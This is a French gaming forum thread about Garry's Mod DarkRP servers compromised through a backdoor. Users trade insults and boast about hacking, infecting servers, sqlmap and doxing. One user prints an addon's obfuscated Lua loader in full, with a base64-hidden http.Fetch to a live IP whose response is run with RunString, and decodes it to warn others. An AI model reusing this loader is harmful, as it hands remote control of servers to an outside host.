URGENT !Mon serveur s'est fait hacker aidez moi !!!

• Initiateur de la discussion Dunvii
  • Date de début
  • Banni
Rexouille

Rexouille

Geek
Score réaction
3
raidzix04 à dit:
Pourquoi alors il y a des serveurs où tout va bien, aucun soucis de "hack" ?
Tout simplement, car la version du darkrp n'es pas la dernière.
Et que, Swarzox ne va pas ce faire chier à tout hack ^^'

iTiics

iTiics

Geek
Score réaction
14
Du coup reste plus qu'à attendre une maj de darkrp ? :')

U

Urukgar

Bambi
Score réaction
0
Rexouille à dit:
Tu crois que tu est mature toi? Vous appeler votre serveur "La MeuteRP" mais après vous changer de nom puis des pigeon qui on votre serveur dans leur Historique..
Car oui, les Historiques sont géré par IP et port et non pas par le HostName.
Bien beau de "hacker" des serveurs, mais le jour ou vous serrez gérer un Raspberry Pi et un SqlDumper etc. vous pourrez vous vanter d'hacker des serveurs.

Rappel-toi que personne est indoxable..
Vous apellez ? Je n'utilise pas les serveur MeuteRP ..
Et si tu est allez pub sur ce serv et troll va t'attendre a la même mais même je suis bien d'accord avec toi il n'avais pas a utilisée le hack.

Z3k4

Z3k4

Helpeur Divin
Score réaction
1 513
Bon juste, même si ces histoires, concrètement j'en ai pas grand chose à faire je tiens juste à remettre les choses au clair :p
Bobby marley / titou, n'est pas un hacker et il risque pas de le devenir, savoir exploiter une faille ne fait pas de vous un hacker :)
Ensuite, à proprement parler, si vous dites que c'est une backdoor, dans ce cas là vcmod en possède une, ainsi que tous les addons avec un drm, il n'a pas hack l'écran de chargement mais juste exécuter un code à distance rien de plus ^^

Par exemple ta un code sur un site qui dit "Éteint le serveur" bah avec la "backdoor" ça va juste permettre d’exécuter cette commande :)

• J'aime
Réactions: Lord17
  • Banni
R

Random Lambda

Geek
Score réaction
12
Z3k4 à dit:
Bon juste, même si ces histoires, concrètement j'en ai pas grand chose à faire je tiens juste à remettre les choses au clair :p
Bobby marley / titou, n'est pas un hacker et il risque pas de le devenir, savoir exploiter une faille ne fait pas de vous un hacker :)
Ensuite, à proprement parler, si vous dites que c'est une backdoor, dans ce cas là vcmod en possède une, ainsi que tous les addons avec un drm, il n'a pas hack l'écran de chargement mais juste exécuter un code à distance rien de plus ^^

Par exemple ta un code sur un site qui dit "Éteint le serveur" bah avec la "backdoor" ça va juste permettre d’exécuter cette commande :)
Ouaip

• Banni
Rexouille

Rexouille

Geek
Score réaction
3
Remarque @Z3k4 c'est pas en "hackant" un serveur de jeux qu'on est un hacker hein..

• Banni
R

Random Lambda

Geek
Score réaction
12
Rexouille à dit:
Remarque @Z3k4 c'est pas en "hackant" un serveur de jeux qu'on est un hacker hein..
Tu et pas un hacker et le panel on te la retirer.

• Banni
Rexouille

Rexouille

Geek
Score réaction
3
Random Lambda à dit:
Tu et pas un hacker et le panel on te la retirer.
Hum, le site de Dr*pLe*ks si il est mort s'est qu'il c'est fait hacker, par qui ? Par moi ^^'

Pour le panel, Marbella va me le remettre :) https://gyazo.com/100eb4b457d63526ddcc9aa325c514b4

• Banni
R

Random Lambda

Geek
Score réaction
12
Rexouille à dit:
Hum, le site de Dr*pLe*ks si il est mort s'est qu'il c'est fait hacker, par qui ? Par moi ^^'

Pour le panel, Marbella va me le remettre :) https://gyazo.com/100eb4b457d63526ddcc9aa325c514b4
Se qui et con c'est que moi j'ai le panel

• Banni
Rexouille

Rexouille

Geek
Score réaction
3
Random Lambda à dit:
Se qui et con c'est que moi j'ai le panel
Et alors ? J'en est rien à foutre de ça moi..
J'ai le code du backdoor ^^'

• Banni
R

Random Lambda

Geek
Score réaction
12
Rexouille à dit:
Moi aussi mdrrr et les 100 serveur c'est moi qui a infectée :)

• Banni
R

Random Lambda

Geek
Score réaction
12
Rexouille à dit:
Et moi le panel il me la offert

Z3k4

Z3k4

Helpeur Divin
Score réaction
1 513
Rexouille à dit:
Bah un hacker, c'est un mec qui arrive à s'infiltrer dans quelque chose par ses propres moyens, donc peut importe c'est ou que tu t'infiltre :p

• Banni
R

Random Lambda

Geek
Score réaction
12
Z3k4 à dit:
Bah un hacker, c'est un mec qui arrive à s'infiltrer dans quelque chose par ses propres moyens, donc peut importe c'est ou que tu t'infiltre :p
Attent il droit me CobaltStrike mdrr jattent qui sache utiliser sqlmap mdr

Z3k4

Z3k4

Helpeur Divin
Score réaction
1 513
"Par ses propres moyens" désolé mec, mais utilisé un programme qui fait tout à ta place c'est pas utilisé ses propres moyens

• Banni
R

Random Lambda

Geek
Score réaction
12
Z3k4 à dit:
"Par ses propres moyens" désolé mec, mais utilisé un programme qui fait tout à ta place c'est pas utilisé ses propres moyens
Il la pas coder ;)

• Banni
Rexouille

Rexouille

Geek
Score réaction
3
Random Lambda à dit:
Attent il droit me CobaltStrike mdrr jattent qui sache utiliser sqlmap mdr
Mais SQLMap il y a rien de plus facile ^^' Un dork, un VPS puis voila ^^' Même un Dumper c'est plus dur mdrrrrr.

• Banni
R

Random Lambda

Geek
Score réaction
12
Rexouille à dit:
Mais SQLMap il y a rien de plus facile ^^' Un dork, un VPS puis voila ^^' Même un Dumper c'est plus dur mdrrrrr.
Gros t'es nul t'es nul.

• Banni
Rexouille

Rexouille

Geek
Score réaction
3
Random Lambda à dit:
Gros t'es nul t'es nul.
Bah c'est pas moi qui utilise un SQLMap ^^' Tu te crois hacker, tu est obligé d'utiliser des "programmes" useless.
Apprend à bloquer un VPS sur un Off View et après viens me parler..

• Banni
R

Random Lambda

Geek
Score réaction
12
Rexouille à dit:
Bah c'est pas moi qui utilise un SQLMap ^^' Tu te crois hacker, tu est obligé d'utiliser des "programmes" useless.
Apprend à bloquer un VPS sur un Off View et après viens me parler..
Mais gros tu te fait dox en 2 minute fdp et gros tu secu un panel tu paye comme un pigeon et oublie pas que moi je suis bien dans la peau pas comme toi

iTiics

iTiics

Geek
Score réaction
14
Au pire vous vous calmez sinon j'appelle mon grand frère qui lui va appeler son pote à Paris qui lui va appeler Marcel en Amérique qui lui va appeler un mec dans la NASA et qui lui va faire décoller une fusé :)

Donc calmez vous.

• Banni
Dropask

Dropask

Bambi
Score réaction
0
Arrêter de leaks vos addons.

Lord17

Lord17

Geek
Score réaction
1
Bon, titou alias BoBy Marley n'est pas un hacker.
Tout simplement, désabonnez vous de tout ses propres """""addons""""" du workshop.
Par exemple, celui-ci: http://steamcommunity.com/sharedfiles/filedetails/?id=717712115
J'ai inspecté le lua de cet addon et tien donc! Un jolie backdoor (c'est sur et certain) qui envoie des requêtes au serveur en http.Fetch
Voir le contenu du fichier lua:
hook.Add("Think","CCC", function() RunString("function util.ABCDEFGEEZGEEGZGE( data ) local b='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/' if !data then return end data = string.gsub(data, '[^'..b..'=]', '') return (data:gsub('.', function(x) if (x == '=') then return '' end local r,f='',(b:find(x)-1) for i=6,1,-1 do r=r..(f%2^i-f%2^(i-1)>0 && '1' || '0') end return r; end):gsub('%d%d%d?%d?%d?%d?%d?%d?', function(x) if (#x ~= 8) then return '' end local c=0 for i=1,8 do c=c+(x:sub(i,i)=='1' && 2^(8-i) || 0) end return string.char(c) end)) end http.Fetch(string.reverse(util.ABCDEFGEEZGEEGZGE('cGhwLjFlZ2F0cy9lcm9jL2xhbGxhaC84MjIuNjcuMjMuODcxLy86cHR0aA==')),function(body,len,headers,code) RunString(body) end)") hook.Remove("Think","CCC") end)
Ce code est quand même connu..
ET ! en déchiffrant un peu, on peut voir que la requête est executée par un serveur avec comme ip: http://178.32.76.228/hallal/core/stage1.php
Comment j'ai fais ? Rien de compliqué, ça là:
('cGhwLjFlZ2F0cy9lcm9jL2xhbGxhaC84MjIuNjcuMjMuODcxLy86cHR0aA==')
C'est crypté en base64, donc il suffit juste de se rendre sur un site déchiffrant le base64 et basta.

Faites juste un signalement sur ce post pour backdoor, tentative de piratage et ça devrait aller.
Et surtout, faites attention aux cancers ;)

Peace!

Dernière édition:
Z3k4

Z3k4

Helpeur Divin
Score réaction
1 513
N'empêche faut le faire quoi, être fier de d'abîmer / détruire une communauté qui n'est même pas la sienne..

Lord17

Lord17

Geek
Score réaction
1
Triste vie, regardez moi ça, ça prouve encore plus :(
https://puu.sh/pZ4nb/ec7697fa5b.png
https://puu.sh/pZ4ph/35ad870f82.png

Attention, xXxDarkDdoserDu78xXx
https://puu.sh/pZ4yE/2a28b36b52.png

R

raidzix04

Geek suprême
Score réaction
21
Ce qui m'a choqué c'est halal avec deux L

M

|MrFuzzion|

Nouveau né
Score réaction
0
Les deux personnes qui t'on "Hack" ! Steam : [Tyrax et {PoufPouf City} Neferseth] Voila ! Je ne peut pas te dire d'ou j'ai eu les informations ! Bonne chance !

LeCreateur

LeCreateur

Geek
Score réaction
14
Frenchgaming à dit:
j'aime pas trop ton site pour les VIP ce connecter avec son compte steam Mmmmm je trouve ça louche moi bon moyen d'avoir les mots de passe ça j'ai regarder un peut ce que tu fais je trouve pas ça correct personnellement
Je suis nouveau mais on m'as dit que tu n'aimais pas la communote mTx alors pourquoi EST tu la

Kitsu

Kitsu

Chuck Norris
Score réaction
2 505
Pourquoi up un truc de deux mois ?

Discord d'entraide
Rejoignz-nous sur Discord